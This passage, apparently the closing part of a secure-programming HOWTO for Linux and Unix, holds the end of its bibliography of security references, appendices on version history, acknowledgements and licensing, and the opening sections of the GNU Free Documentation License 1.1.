[Gong 1999] Gong, Li. June 1999. Inside Java 2 Platform Security. Reading,
MA: Addison Wesley Longman, Inc. ISBN 0-201-31000-7.

[Gundavaram Unknown] Gundavaram, Shishir, and Tom Christiansen. Date Unknown.
Perl CGI Programming FAQ. [http://language.perl.com/CPAN/doc/FAQs/cgi/
perl-cgi-faq.html] http://language.perl.com/CPAN/doc/FAQs/cgi/
perl-cgi-faq.html

[Hall 1999] Hall, Brian "Beej". Beej's Guide to Network Programming Using
Internet Sockets. 13-Jan-1999. Version 1.5.5. [http://www.ecst.csuchico.edu/
~beej/guide/net] http://www.ecst.csuchico.edu/~beej/guide/net

[Howard 2002] Howard, Michael and David LeBlanc. 2002. Writing Secure Code.
Redmond, Washington: Microsoft Press. ISBN 0-7356-1588-8.

[ISO 12207] International Organization for Standardization (ISO). 1995.
Information technology -- Software life cycle processes ISO/IEC 12207:1995.

[ISO 13335] International Organization for Standardization (ISO). ISO/IEC TR
13335. Guidelines for the Management of IT Security (GMITS). Note that this
is a five-part technical report (not a standard); see also ISO/IEC 17799:
2000. It includes:

<A0><A0>*<2A>ISO 13335-1: Concepts and Models for IT Security

<A0><A0>*<2A>ISO 13335-2: Managing and Planning IT Security

<A0><A0>*<2A>ISO 13335-3: Techniques for the Management of IT Security

<A0><A0>*<2A>ISO 13335-4: Selection of Safeguards

<A0><A0>*<2A>ISO 13335-5: Safeguards for External Connections


[ISO 17799] International Organization for Standardization (ISO). December
2000. Code of Practice for Information Security Management. ISO/IEC 17799:
2000.

[ISO 9000] International Organization for Standardization (ISO). 2000.
Quality management systems - Fundamentals and vocabulary. ISO 9000:2000. See
[http://www.iso.ch/iso/en/iso9000-14000/iso9000/selection_use/
iso9000family.html] http://www.iso.ch/iso/en/iso9000-14000/iso9000/
selection_use/iso9000family.html

[ISO 9001] International Organization for Standardization (ISO). 2000.
Quality management systems - Requirements ISO 9001:2000

[Jones 2000] Jones, Jennifer. October 30, 2000. ``Banking on Privacy''.
InfoWorld, Volume 22, Issue 44. San Mateo, CA: International Data Group
(IDG). pp. 1-12.

[Kelsey 1998] Kelsey, J., B. Schneier, D. Wagner, and C. Hall. March 1998.
"Cryptanalytic Attacks on Pseudorandom Number Generators." Fast Software
Encryption, Fifth International Workshop Proceedings (March 1998),
Springer-Verlag, 1998, pp. 168-188. [http://www.counterpane.com/
pseudorandom_number.html] http://www.counterpane.com/
pseudorandom_number.html.

[Kernighan 1988] Kernighan, Brian W., and Dennis M. Ritchie. 1988. The C
Programming Language. Second Edition. Englewood Cliffs, NJ: Prentice-Hall.
ISBN 0-13-110362-8.

[Kim 1996] Kim, Eugene Eric. 1996. CGI Developer's Guide. SAMS.net
Publishing. ISBN: 1-57521-087-8 [http://www.eekim.com/pubs/cgibook] http://
www.eekim.com/pubs/cgibook

Kolsek [2002] Kolsek, Mitja. December 2002. Session Fixation Vulnerability in
Web-based Applications [http://www.acros.si/papers/session_fixation.pdf]
http://www.acros.si/papers/session_fixation.pdf.

[Kuchling 2000]. Kuchling, A.M. 2000. Restricted Execution HOWTO. [http://
www.python.org/doc/howto/rexec/rexec.html] http://www.python.org/doc/howto/
rexec/rexec.html

[Kuhn 2002] Kuhn, Markus G. Optical Time-Domain Eavesdropping Risks of CRT
displays. Proceedings of the 2002 IEEE Symposium on Security and Privacy,
Oakland, CA, May 12-15, 2002. [http://www.cl.cam.ac.uk/~mgk25/
ieee02-optical.pdf] http://www.cl.cam.ac.uk/~mgk25/ieee02-optical.pdf

[LSD 2001] The Last Stage of Delirium. July 4, 2001. UNIX Assembly Codes
Development for Vulnerabilities Illustration Purposes. [http://lsd-pl.net/
papers.html#assembly] http://lsd-pl.net/papers.html#assembly.

[McClure 1999] McClure, Stuart, Joel Scambray, and George Kurtz. 1999.
Hacking Exposed: Network Security Secrets and Solutions. Berkeley, CA:
Osbourne/McGraw-Hill. ISBN 0-07-212127-0.

[McKusick 1999] McKusick, Marshall Kirk. January 1999. ``Twenty Years of
Berkeley Unix: From AT&T-Owned to Freely Redistributable.'' Open Sources:
Voices from the Open Source Revolution. [http://www.oreilly.com/catalog/
opensources/book/kirkmck.html] http://www.oreilly.com/catalog/opensources/
book/kirkmck.html.

[McGraw 1999] McGraw, Gary, and Edward W. Felten. December 1998. Twelve Rules
for developing more secure Java code. Javaworld. [http://www.javaworld.com/
javaworld/jw-12-1998/jw-12-securityrules.html] http://www.javaworld.com/
javaworld/jw-12-1998/jw-12-securityrules.html.

[McGraw 1999] McGraw, Gary, and Edward W. Felten. January 25, 1999. Securing
Java: Getting Down to Business with Mobile Code, 2nd Edition John Wiley &
Sons. ISBN 047131952X. [http://www.securingjava.com] http://
www.securingjava.com.

[McGraw 2000a] McGraw, Gary and John Viega. March 1, 2000. Make Your Software
Behave: Learning the Basics of Buffer Overflows. [http://www-4.ibm.com/
software/developer/library/overflows/index.html] http://www-4.ibm.com/
software/developer/library/overflows/index.html.

[McGraw 2000b] McGraw, Gary and John Viega. April 18, 2000. Make Your
Software Behave: Software strategies In the absence of hardware, you can
devise a reasonably secure random number generator through software. [http://
www-106.ibm.com/developerworks/library/randomsoft/index.html?dwzone=security]
http://www-106.ibm.com/developerworks/library/randomsoft/index.html?dwzone=
security.

[Miller 1995] Miller, Barton P., David Koski, Cjin Pheow Lee, Vivekananda
Maganty, Ravi Murthy, Ajitkumar Natarajan, and Jeff Steidl. 1995. Fuzz
Revisited: A Re-examination of the Reliability of UNIX Utilities and
Services. [ftp://grilled.cs.wisc.edu/technical_papers/fuzz-revisited.pdf]
ftp://grilled.cs.wisc.edu/technical_papers/fuzz-revisited.pdf.

[Miller 1999] Miller, Todd C. and Theo de Raadt. ``strlcpy and strlcat --
Consistent, Safe, String Copy and Concatenation'' Proceedings of Usenix '99.
[http://www.usenix.org/events/usenix99/millert.html] http://www.usenix.org/
events/usenix99/millert.html and [http://www.usenix.org/events/usenix99/
full_papers/millert/PACKING_LIST] http://www.usenix.org/events/usenix99/
full_papers/millert/PACKING_LIST

[Mookhey 2002] Mookhey, K. K. The Unix Auditor's Practical Handbook. [http://
www.nii.co.in/tuaph.html] http://www.nii.co.in/tuaph.html.

[Mudge 1995] Mudge. October 20, 1995. How to write Buffer Overflows. l0pht
advisories. [http://www.l0pht.com/advisories/bufero.html] http://
www.l0pht.com/advisories/bufero.html.

[Murhammer 1998] Murhammer, Martin W., Orcun Atakan, Stefan Bretz, Larry R.
Pugh, Kazunari Suzuki, and David H. Wood. October 1998. TCP/IP Tutorial and
Technical Overview IBM International Technical Support Organization. [http://
www.redbooks.ibm.com/pubs/pdfs/redbooks/gg243376.pdf] http://
www.redbooks.ibm.com/pubs/pdfs/redbooks/gg243376.pdf

[NCSA] NCSA Secure Programming Guidelines. [http://www.ncsa.uiuc.edu/General/
Grid/ACES/security/programming] http://www.ncsa.uiuc.edu/General/Grid/ACES/
security/programming.

[Neumann 2000] Neumann, Peter. 2000. "Robust Nonproprietary Software."
Proceedings of the 2000 IEEE Symposium on Security and Privacy (the ``Oakland
Conference''), May 14-17, 2000, Berkeley, CA. Los Alamitos, CA: IEEE Computer
Society. pp.122-123.

[NSA 2000] National Security Agency (NSA). September 2000. Information
Assurance Technical Framework (IATF). [http://www.iatf.net] http://
www.iatf.net.

[Open Group 1997] The Open Group. 1997. Single UNIX Specification, Version 2
(UNIX 98). [http://www.opengroup.org/online-pubs?DOC=007908799] http://
www.opengroup.org/online-pubs?DOC=007908799.

[OSI 1999] Open Source Initiative. 1999. The Open Source Definition. [http://
www.opensource.org/osd.html] http://www.opensource.org/osd.html.

[Opplinger 1998] Oppliger, Rolf. 1998. Internet and Intranet Security.
Norwood, MA: Artech House. ISBN 0-89006-829-1.

[Paulk 1993a] Mark C. Paulk, Bill Curtis, Mary Beth Chrissis, and Charles V.
Weber. Capability Maturity Model for Software, Version 1.1. Software
Engineering Institute, CMU/SEI-93-TR-24. DTIC Number ADA263403, February
1993. [http://www.sei.cmu.edu/activities/cmm/obtain.cmm.html] http://
www.sei.cmu.edu/activities/cmm/obtain.cmm.html.

[Paulk 1993b] Mark C. Paulk, Charles V. Weber, Suzanne M. Garcia, Mary Beth
Chrissis, and Marilyn W. Bush. Key Practices of the Capability Maturity
Model, Version 1.1. Software Engineering Institute. CMU/SEI-93-TR-25, DTIC
Number ADA263432, February 1993.

[Peteanu 2000] Peteanu, Razvan. July 18, 2000. Best Practices for Secure Web
Development. [http://members.home.net/razvan.peteanu] http://members.home.net
/razvan.peteanu

[Pfleeger 1997] Pfleeger, Charles P. 1997. Security in Computing. Upper
Saddle River, NJ: Prentice-Hall PTR. ISBN 0-13-337486-6.

[Phillips 1995] Phillips, Paul. September 3, 1995. Safe CGI Programming.
[http://www.go2net.com/people/paulp/cgi-security/safe-cgi.txt] http://
www.go2net.com/people/paulp/cgi-security/safe-cgi.txt

[Quintero 1999] Quintero, Federico Mena, Miguel de Icaza, and Morten Welinder
GNOME Programming Guidelines [http://developer.gnome.org/doc/guides/
programming-guidelines/book1.html] http://developer.gnome.org/doc/guides/
programming-guidelines/book1.html

[Raymond 1997] Raymond, Eric. 1997. The Cathedral and the Bazaar. [http://
www.catb.org/~esr/writings/cathedral-bazaar] http://www.catb.org/~esr/
writings/cathedral-bazaar

[Raymond 1998] Raymond, Eric. April 1998. Homesteading the Noosphere. [http:/
/www.catb.org/~esr/writings/homesteading/homesteading.html] http://
www.catb.org/~esr/writings/homesteading/homesteading.html

[Ranum 1998] Ranum, Marcus J. 1998. Security-critical coding for programmers
- a C and UNIX-centric full-day tutorial. [http://www.clark.net/pub/mjr/pubs/
pdf/] http://www.clark.net/pub/mjr/pubs/pdf/.

[RFC 822] August 13, 1982 Standard for the Format of ARPA Internet Text
Messages. IETF RFC 822. [http://www.ietf.org/rfc/rfc0822.txt] http://
www.ietf.org/rfc/rfc0822.txt.

[rfp 1999] rain.forest.puppy. 1999. ``Perl CGI problems''. Phrack Magazine.
Issue 55, Article 07. [http://www.phrack.com/search.phtml?view&article=p55-7]
http://www.phrack.com/search.phtml?view&article=p55-7 or [http://
www.insecure.org/news/P55-07.txt] http://www.insecure.org/news/P55-07.txt.

[Rijmen 2000] Rijmen, Vincent. "LinuxSecurity.com Speaks With AES Winner".
[http://www.linuxsecurity.com/feature_stories/interview-aes-3.html] http://
www.linuxsecurity.com/feature_stories/interview-aes-3.html.

[Rochkind 1985]. Rochkind, Marc J. Advanced Unix Programming. Englewood
Cliffs, NJ: Prentice-Hall, Inc. ISBN 0-13-011818-4.

[Sahu 2002] Sahu, Bijaya Nanda, Srinivasan S. Muthuswamy, Satya Nanaji Rao
Mallampalli, and Venkata R. Bonam. July 2002 ``Is your Java code secure -- or
exposed? Build safer applications now to avoid trouble later'' [http://
www-106.ibm.com/developerworks/java/library/j-staticsec.html?loc=dwmain]
http://www-106.ibm.com/developerworks/java/library/j-staticsec.html?loc=
dwmain

[St. Laurent 2000] St. Laurent, Simon. February 2000. XTech 2000 Conference
Reports. ``When XML Gets Ugly''. [http://www.xml.com/pub/2000/02/xtech/
megginson.html] http://www.xml.com/pub/2000/02/xtech/megginson.html.

[Saltzer 1974] Saltzer, J. July 1974. ``Protection and the Control of
Information Sharing in MULTICS''. Communications of the ACM. v17 n7. pp.
388-402.

[Saltzer 1975] Saltzer, J., and M. Schroeder. September 1975. ``The
Protection of Information in Computing Systems''. Proceedings of the IEEE.
v63 n9. pp. 1278-1308. [http://www.mediacity.com/~norm/CapTheory/ProtInf]
http://www.mediacity.com/~norm/CapTheory/ProtInf. Summarized in [Pfleeger
1997, 286].

[Schneider 2000] Schneider, Fred B. 2000. "Open Source in Security: Visting
the Bizarre." Proceedings of the 2000 IEEE Symposium on Security and Privacy
(the ``Oakland Conference''), May 14-17, 2000, Berkeley, CA. Los Alamitos,
CA: IEEE Computer Society. pp.126-127.

[Schneier 1996] Schneier, Bruce. 1996. Applied Cryptography, Second Edition:
Protocols, Algorithms, and Source Code in C. New York: John Wiley and Sons.
ISBN 0-471-12845-7.

[Schneier 1998] Schneier, Bruce and Mudge. November 1998. Cryptanalysis of
Microsoft's Point-to-Point Tunneling Protocol (PPTP) Proceedings of the 5th
ACM Conference on Communications and Computer Security, ACM Press. [http://
www.counterpane.com/pptp.html] http://www.counterpane.com/pptp.html.

[Schneier 1999] Schneier, Bruce. September 15, 1999. ``Open Source and
Security''. Crypto-Gram. Counterpane Internet Security, Inc. [http://
www.counterpane.com/crypto-gram-9909.html] http://www.counterpane.com/
crypto-gram-9909.html

[Seifried 1999] Seifried, Kurt. October 9, 1999. Linux Administrator's
Security Guide. [http://www.securityportal.com/lasg] http://
www.securityportal.com/lasg.

[Seifried 2001] Seifried, Kurt. September 2, 2001. WWW Authentication [http:/
/www.seifried.org/security/www-auth/index.html] http://www.seifried.org/
security/www-auth/index.html.

[Shankland 2000] Shankland, Stephen. ``Linux poses increasing threat to
Windows 2000''. CNET. [http://news.cnet.com/news/0-1003-200-1549312.html]
http://news.cnet.com/news/0-1003-200-1549312.html

[Shostack 1999] Shostack, Adam. June 1, 1999. Security Code Review Guidelines
. [http://www.homeport.org/~adam/review.html] http://www.homeport.org/~adam/
review.html.

[Sibert 1996] Sibert, W. Olin. Malicious Data and Computer Security. (NIST)
NISSC '96. [http://www.fish.com/security/maldata.html] http://www.fish.com/
security/maldata.html

[Sitaker 1999] Sitaker, Kragen. Feb 26, 1999. How to Find Security Holes
[http://www.pobox.com/~kragen/security-holes.html] http://www.pobox.com/
~kragen/security-holes.html and [http://www.dnaco.net/~kragen/
security-holes.html] http://www.dnaco.net/~kragen/security-holes.html

[SSE-CMM 1999] SSE-CMM Project. April 1999. Systems Security Engineering
Capability Maturity Model (SSE CMM) Model Description Document. Version 2.0.
[http://www.sse-cmm.org] http://www.sse-cmm.org

[Stallings 1996] Stallings, William. Practical Cryptography for Data
Internetworks. Los Alamitos, CA: IEEE Computer Society Press. ISBN
0-8186-7140-8.

[Stein 1999]. Stein, Lincoln D. September 13, 1999. The World Wide Web
Security FAQ. Version 2.0.1 [http://www.w3.org/Security/Faq/
www-security-faq.html] http://www.w3.org/Security/Faq/www-security-faq.html

[Swan 2001] Swan, Daniel. January 6, 2001. comp.os.linux.security FAQ.
Version 1.0. [http://www.linuxsecurity.com/docs/colsfaq.html] http://
www.linuxsecurity.com/docs/colsfaq.html.

[Swanson 1996] Swanson, Marianne, and Barbara Guttman. September 1996.
Generally Accepted Principles and Practices for Securing Information
Technology Systems. NIST Computer Security Special Publication (SP) 800-14.
[http://csrc.nist.gov/publications/nistpubs/index.html] http://csrc.nist.gov/
publications/nistpubs/index.html.

[Thompson 1974] Thompson, K. and D.M. Richie. July 1974. ``The UNIX
Time-Sharing System''. Communications of the ACM Vol. 17, No. 7. pp. 365-375.

[Torvalds 1999] Torvalds, Linus. February 1999. ``The Story of the Linux
Kernel''. Open Sources: Voices from the Open Source Revolution. Edited by
Chris Dibona, Mark Stone, and Sam Ockman. O'Reilly and Associates. ISBN
1565925823. [http://www.oreilly.com/catalog/opensources/book/linus.html]
http://www.oreilly.com/catalog/opensources/book/linus.html

[TruSecure 2001] TruSecure. August 2001. Open Source Security: A Look at the
Security Benefits of Source Code Access. [http://www.trusecure.com/html/tspub
/whitepapers/open_source_security5.pdf] http://www.trusecure.com/html/tspub/
whitepapers/open_source_security5.pdf

[Unknown] SETUID(7) [http://www.homeport.org/~adam/setuid.7.html] http://
www.homeport.org/~adam/setuid.7.html.

[Van Biesbrouck 1996] Van Biesbrouck, Michael. April 19, 1996. [http://
www.csclub.uwaterloo.ca/u/mlvanbie/cgisec] http://www.csclub.uwaterloo.ca/u/
mlvanbie/cgisec.

[van Oorschot 1994] van Oorschot, P. and M. Wiener. November 1994. ``Parallel
Collision Search with Applications to Hash Functions and Discrete
Logarithms.'' Proceedings of ACM Conference on Computer and Communications
Security.

[Venema 1996] Venema, Wietse. 1996. Murphy's law and computer security.
[http://www.fish.com/security/murphy.html] http://www.fish.com/security/
murphy.html

[Viega 2002] Viega, John, and Gary McGraw. 2002. Building Secure Software.
Addison-Wesley. ISBN 0201-72152-X.

[Watters 1996] Watters, Arron, Guido van Rossum, James C. Ahlstrom. 1996.
Internet Programming with Python. NY, NY: Henry Hold and Company, Inc.

[Wheeler 1996] Wheeler, David A., Bill Brykczynski, and Reginald N. Meeson,
Jr. Software Inspection: An Industry Best Practice. 1996. Los Alamitos, CA:
IEEE Computer Society Press. IEEE Copmuter Society Press Order Number
BP07340. Library of Congress Number 95-41054. ISBN 0-8186-7340-0.

[Witten 2001] September/October 2001. Witten, Brian, Carl Landwehr, and
Michael Caloyannides. ``Does Open Source Improve System Security?'' IEEE
Software. pp. 57-61. [http://www.computer.org/software] http://
www.computer.org/software

[Wood 1985] Wood, Patrick H. and Stephen G. Kochan. 1985. Unix System
Security. Indianapolis, Indiana: Hayden Books. ISBN 0-8104-6267-2.

[Wreski 1998] Wreski, Dave. August 22, 1998. Linux Security Administrator's
Guide. Version 0.98. [http://www.nic.com/~dave/SecurityAdminGuide/index.html]
http://www.nic.com/~dave/SecurityAdminGuide/index.html

[Yoder 1998] Yoder, Joseph and Jeffrey Barcalow. 1998. Architectural Patterns
for Enabling Application Security. PLoP '97 [http://st-www.cs.uiuc.edu/
~hanmer/PLoP-97/Proceedings/yoder.pdf] http://st-www.cs.uiuc.edu/~hanmer/
PLoP-97/Proceedings/yoder.pdf

[Zalewski 2001] Zalewski, Michael. May 16-17, 2001. Delivering Signals for
Fun and Profit: Understanding, exploiting and preventing signal-handling
related vulnerabilities. Bindview Corporation. [http://razor.bindview.com/
publish/papers/signals.txt] http://razor.bindview.com/publish/papers/
signals.txt

[Zoebelein 1999] Zoebelein, Hans U. April 1999. The Internet Operating System
Counter. [http://www.leb.net/hzo/ioscount] http://www.leb.net/hzo/ioscount.
-----------------------------------------------------------------------------

Appendix A. History

Here are a few key events in the development of this book, starting from most
recent events:

2002-10-29 David A. Wheeler
    Version 3.000 released, adding a new section on determining security
    requirements and a discussion of the Common Criteria, broadening the
    document. Many smaller improvements were incorporated as well.

2001-01-01 David A. Wheeler
    Version 2.70 released, adding a significant amount of additional
    material, such as a significant expansion of the discussion of cross-site
    malicious content, HTML/URI filtering, and handling temporary files.

2000-05-24 David A. Wheeler
    Switched to GNU's GFDL license, added more content.

2000-04-21 David A. Wheeler
    Version 2.00 released, dated 21 April 2000, which switched the document's
    internal format from the Linuxdoc DTD to the DocBook DTD. Thanks to Jorge
    Godoy for helping me perform the transition.

2000-04-04 David A. Wheeler
    Version 1.60 released; changed so that it now covers both Linux and Unix.
    Since most of the guidelines covered both, and many/most app developers
    want their apps to run on both, it made sense to cover both.

2000-02-09 David A. Wheeler
    Noted that the document is now part of the Linux Documentation Project
    (LDP).

1999-11-29 David A. Wheeler
    Initial version (1.0) completed and released to the public.


Note that a more detailed description of changes is available on-line in the
``ChangeLog'' file.
-----------------------------------------------------------------------------

Appendix B. Acknowledgements

<A0>                                      As iron sharpens iron, so one man
                                       sharpens another.
<A0>                                                        Proverbs 27:17 (NIV)

My thanks to the following people who kept me honest by sending me emails
noting errors, suggesting areas to cover, asking questions, and so on. Where
email addresses are included, they've been shrouded by prepending my
``thanks.'' so bulk emailers won't easily get these addresses; inclusion of
people in this list is not an authorization to send unsolicited bulk email to
them.

<A0><A0>*<2A>Neil Brown (thanks.neilb@cse.unsw.edu.au)

<A0><A0>*<2A>Martin Douda (thanks.mad@students.zcu.cz)

<A0><A0>*<2A>Jorge Godoy

<A0><A0>*<2A>Scott Ingram (thanks.scott@silver.jhuapl.edu)

<A0><A0>*<2A>Michael Kerrisk

<A0><A0>*<2A>Doug Kilpatrick

<A0><A0>*<2A>John Levon (levon@movementarian.org)

<A0><A0>*<2A>Ryan McCabe (thanks.odin@numb.org)

<A0><A0>*<2A>Paul Millar (thanks.paulm@astro.gla.ac.uk)

<A0><A0>*<2A>Chuck Phillips (thanks.cdp@peakpeak.com)

<A0><A0>*<2A>Martin Pool (thanks.mbp@humbug.org.au)

<A0><A0>*<2A>Eric S. Raymond (thanks.esr@snark.thyrsus.com)

<A0><A0>*<2A>Marc Welz

<A0><A0>*<2A>Eric Werme (thanks.werme@alpha.zk3.dec.com)


If you want to be on this list, please send me a constructive suggestion at
[mailto:dwheeler@dwheeler.com] dwheeler@dwheeler.com. If you send me a
constructive suggestion, but do not want credit, please let me know that when
you send your suggestion, comment, or criticism; normally I expect that
people want credit, and I want to give them that credit. My current process
is to add contributor names to this list in the document, with more detailed
explanation of their comment in the ChangeLog for this document (available
on-line). Note that although these people have sent in ideas, the actual text
is my own, so don't blame them for any errors that may remain. Instead,
please send me another constructive suggestion.
-----------------------------------------------------------------------------

Appendix C. About the Documentation License

<A0>                                      A copy of the text of the edict was to
                                       be issued as law in every province and
                                       made known to the people of every
                                       nationality so they would be ready for
                                       that day.
<A0>                                                           Esther 3:14 (NIV)

This document is Copyright (C) 1999-2000 David A. Wheeler. Permission is
granted to copy, distribute and/or modify this document under the terms of
the GNU Free Documentation License (FDL), Version 1.1 or any later version
published by the Free Software Foundation; with the invariant sections being
``About the Author'', with no Front-Cover Texts, and no Back-Cover texts. A
copy of the license is included below in Appendix D.

These terms do permit mirroring by other web sites, but be sure to do the
following:

<A0><A0>*<2A>make sure your mirrors automatically get upgrades from the master site,

<A0><A0>*<2A>clearly show the location of the master site ([http://www.dwheeler.com/
    secure-programs] http://www.dwheeler.com/secure-programs), with a
    hypertext link to the master site, and

<A0><A0>*<2A>give me (David A. Wheeler) credit as the author.


The first two points primarily protect me from repeatedly hearing about
obsolete bugs. I do not want to hear about bugs I fixed a year ago, just
because you are not properly mirroring the document. By linking to the master
site, users can check and see if your mirror is up-to-date. I'm sensitive to
the problems of sites which have very strong security requirements and
therefore cannot risk normal connections to the Internet; if that describes
your situation, at least try to meet the other points and try to occasionally
sneakernet updates into your environment.

By this license, you may modify the document, but you can't claim that what
you didn't write is yours (i.e., plagiarism) nor can you pretend that a
modified version is identical to the original work. Modifying the work does
not transfer copyright of the entire work to you; this is not a ``public
domain'' work in terms of copyright law. See the license in Appendix D for
details. If you have questions about what the license allows, please contact
me. In most cases, it's better if you send your changes to the master
integrator (currently David A. Wheeler), so that your changes will be
integrated with everyone else's changes into the master copy.

I am not a lawyer, nevertheless, it's my position as an author and software
developer that any code fragments not explicitly marked otherwise are so
small that their use fits under the ``fair use'' doctrine in copyright law.
In other words, unless marked otherwise, you can use the code fragments
without any restriction at all. Copyright law does not permit copyrighting
absurdly small components of a work (e.g., ``I own all rights to B-flat and
B-flat minor chords''), and the fragments not marked otherwise are of the
same kind of minuscule size when compared to real programs. I've done my best
to give credit for specific pieces of code written by others. Some of you may
still be concerned about the legal status of this code, and I want make sure
that it's clear that you can use this code in your software. Therefore, code
fragments included directly in this document not otherwise marked have also
been released by me under the terms of the ``MIT license'', to ensure you
that there's no serious legal encumbrance:
  Source code in this book not otherwise identified is
  Copyright (c) 1999-2001 David A. Wheeler.

  Permission is hereby granted, free of charge, to any person
  obtaining a copy of the source code in this book not
  otherwise identified (the "Software"), to deal in the
  Software without restriction, including without limitation
  the rights to use, copy, modify, merge, publish, distribute,
  sublicense, and/or sell copies of the Software, and to
  permit persons to whom the Software is furnished to do so,
  subject to the following conditions:

  The above copyright notice and this permission notice shall be
  included in all copies or substantial portions of the Software.

  THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
  EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
  WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
  PURPOSE AND NONINFRINGEMENT.
  IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
  LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
  WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
  ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
  OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-----------------------------------------------------------------------------

Appendix D. GNU Free Documentation License

Version 1.1, March 2000

Copyright <20> 2000

<A0><A0><A0><A0><A0><A0>Free<A0>Software<A0>Foundation,<2C>Inc.<2E>
<A0><A0><A0><A0><A0><A0>59 Temple Place, Suite 330,<2C>
<A0><A0><A0><A0><A0><A0>Boston,<2C>
<A0><A0><A0><A0><A0><A0>MA<A0><A0>
<A0><A0><A0><A0><A0><A0>02111-1307<30><37>
<A0><A0><A0><A0><A0><A0>USA
<A0><A0><A0><A0>
Everyone is permitted to copy and distribute verbatim copies of this license
document, but changing it is not allowed.

0. PREAMBLE
    The purpose of this License is to make a manual, textbook, or other
    written document "free" in the sense of freedom: to assure everyone the
    effective freedom to copy and redistribute it, with or without modifying
    it, either commercially or noncommercially. Secondarily, this License
    preserves for the author and publisher a way to get credit for their
    work, while not being considered responsible for modifications made by
    others.

    This License is a kind of "copyleft", which means that derivative works
    of the document must themselves be free in the same sense. It complements
    the GNU General Public License, which is a copyleft license designed for
    free software.

    We have designed this License in order to use it for manuals for free
    software, because free software needs free documentation: a free program
    should come with manuals providing the same freedoms that the software
    does. But this License is not limited to software manuals; it can be used
    for any textual work, regardless of subject matter or whether it is
    published as a printed book. We recommend this License principally for
    works whose purpose is instruction or reference.

1. APPLICABILITY AND DEFINITIONS
    This License applies to any manual or other work that contains a notice
    placed by the copyright holder saying it can be distributed under the
    terms of this License. The "Document" , below, refers to any such manual
    or work. Any member of the public is a licensee, and is addressed as
    "you".

    A "Modified Version" of the Document means any work containing the
    Document or a portion of it, either copied verbatim, or with
    modifications and/or translated into another language.

    A "Secondary Section" is a named appendix or a front-matter section of
    the Document that deals exclusively with the relationship of the
    publishers or authors of the Document to the Document's overall subject
    (or to related matters) and contains nothing that could fall directly
    within that overall subject. (For example, if the Document is in part a
    textbook of mathematics, a Secondary Section may not explain any
    mathematics.) The relationship could be a matter of historical connection
    with the subject or with related matters, or of legal, commercial,
    philosophical, ethical or political position regarding them.

    The "Invariant Sections" are certain Secondary Sections whose titles are
    designated, as being those of Invariant Sections, in the notice that says
    that the Document is released under this License.

    The "Cover Texts" are certain short passages of text that are listed, as
    Front-Cover Texts or Back-Cover Texts, in the notice that says that the
    Document is released under this License.

    A "Transparent" copy of the Document means a machine-readable copy,
    represented in a format whose specification is available to the general
    public, whose contents can be viewed and edited directly and
    straightforwardly with generic text editors or (for images composed of
    pixels) generic paint programs or (for drawings) some widely available
    drawing editor, and that is suitable for input to text formatters or for
    automatic translation to a variety of formats suitable for input to text
    formatters. A copy made in an otherwise Transparent file format whose
    markup has been designed to thwart or discourage subsequent modification
    by readers is not Transparent. A copy that is not "Transparent" is called
    "Opaque".

    Examples of suitable formats for Transparent copies include plain ASCII
    without markup, Texinfo input format, LaTeX input format, SGML or XML
    using a publicly available DTD, and standard-conforming simple HTML
    designed for human modification. Opaque formats include PostScript, PDF,
    proprietary formats that can be read and edited only by proprietary word
    processors, SGML or XML for which the DTD and/or processing tools are not
    generally available, and the machine-generated HTML produced by some word
    processors for output purposes only.

    The "Title Page" means, for a printed book, the title page itself, plus
    such following pages as are needed to hold, legibly, the material this
    License requires to appear in the title page. For works in formats which
    do not have any title page as such, "Title Page" means the text near the
    most prominent appearance of the work's title, preceding the beginning of
    the body of the text.

2. VERBATIM COPYING
    You may copy and distribute the Document in any medium, either
    commercially or noncommercially, provided that this License, the
    copyright notices, and the license notice saying this License applies to
    the Document are reproduced in all copies, and that you add no other
    conditions whatsoever to those of this License. You may not use technical
    measures to obstruct or control the reading or further copying of the
    copies you make or distribute. However, you may accept compensation in
    exchange for copies. If you distribute a large enough number of copies
    you must also follow the conditions in section 3.

    You may also lend copies, under the same conditions stated above, and you
    may publicly display copies.

3. COPYING IN QUANTITY
    If you publish printed copies of the Document numbering more than 100,
    and the Document's license notice requires Cover Texts, you must enclose
    the copies in covers that carry, clearly and legibly, all these Cover
    Texts: Front-Cover Texts on the front cover, and Back-Cover Texts on the
    back cover. Both covers must also clearly and legibly identify you as the
    publisher of these copies. The front cover must present the full title
    with all words of the title equally prominent and visible. You may add
    other material on the covers in addition. Copying with changes limited to
    the covers, as long as they preserve the title of the Document and
    satisfy these conditions, can be treated as verbatim copying in other
    respects.

    If the required texts for either cover are too voluminous to fit legibly,
    you should put the first ones listed (as many as fit reasonably) on the
    actual cover, and continue the rest onto adjacent pages.

    If you publish or distribute Opaque copies of the Document numbering more
    than 100, you must either include a machine-readable Transparent copy
    along with each Opaque copy, or state in or with each Opaque copy a
    publicly-accessible computer-network location containing a complete
    Transparent copy of the Document, free of added material, which the
    general network-using public has access to download anonymously at no
    charge using public-standard network protocols. If you use the latter
    option, you must take reasonably prudent steps, when you begin
    distribution of Opaque copies in quantity, to ensure that this
    Transparent copy will remain thus accessible at the stated location until
    at least one year after the last time you distribute an Opaque copy
    (directly or through your agents or retailers) of that edition to the
    public.

    It is requested, but not required, that you contact the authors of the
    Document well before redistributing any large number of copies, to give
    them a chance to provide you with an updated version of the Document.

4. MODIFICATIONS
    You may copy and distribute a Modified Version of the Document under the
    conditions of sections 2 and 3 above, provided that you release the
    Modified Version under precisely this License, with the Modified Version
    filling the role of the Document, thus licensing distribution and
    modification of the Modified Version to whoever possesses a copy of it.
    In addition, you must do these things in the Modified Version:

     A. Use in the Title Page (and on the covers, if any) a title distinct
        from that of the Document, and from those of previous versions (which
        should, if there were any, be listed in the History section of the
        Document). You may use the same title as a previous version if the
        original publisher of that version gives permission.

     B. List on the Title Page, as authors, one or more persons or entities
        responsible for authorship of the modifications in the Modified
        Version, together with at least five of the principal authors of the
        Document (all of its principal authors, if it has less than five).

     C. State on the Title Page the name of the publisher of the Modified
        Version, as the publisher.

     D. Preserve all the copyright notices of the Document.

     E. Add an appropriate copyright notice for your modifications adjacent
        to the other copyright notices.

